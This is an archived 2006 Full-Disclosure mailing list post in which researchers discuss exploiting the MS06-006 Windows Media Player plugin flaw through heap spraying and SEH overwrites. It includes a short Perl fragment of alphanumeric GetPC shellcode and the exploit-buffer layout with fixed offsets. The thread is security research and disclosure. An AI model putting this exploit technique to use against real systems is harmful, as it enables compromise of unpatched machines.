lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <200602170820.28319.fdlist@digitaloffense.net>
Date: Fri Feb 17 14:20:39 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-0[0]6 Windows Media Player Exploitation
	[CODE]

On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.  
[ snip ] 

> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a00000 region which you can use as a direct
> jump point for the payload, without any of the fancy frame manipulation
> tricks that I am too tired to try at this hour of the night/morning.

Nice :-)

> This should also be (theoretically) version-independent.  Thanks to the
> similarities of the heap management APIs and the fact that most DLLs
> from MS use high bases, I'd bet money that this works across WMP
> versions on anything from NT 4.0 to 2003. 

I ran into problems with Skylined's alphanumeric GetPC code - on Windows 
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our 
shellcode is one, since we smash SEH on the way down). Did some fancy 
8086 instructions to get around this (thanks vlad902 - the human 
assembler), so, for fwiw:

my $getpc = 
"\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292917
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
"\x50\x59"; # push eax, pop ecx

substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] 
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

> It's likely, as well, that 
> this one technique works on any script-enabled browser that supports
> the plugin with the same results.

I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some 
more time I will play with the heap spray method and see if that works 
cross-browser/os/version as well. Looks like heap spray is the way to go, 
at least for Firefox...

> 'Nuff teasing.  Code attached.  It is important to note that you should
> read the inline disclaimer *BEFORE* using the code.

Thanks for sharing!

-HD

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ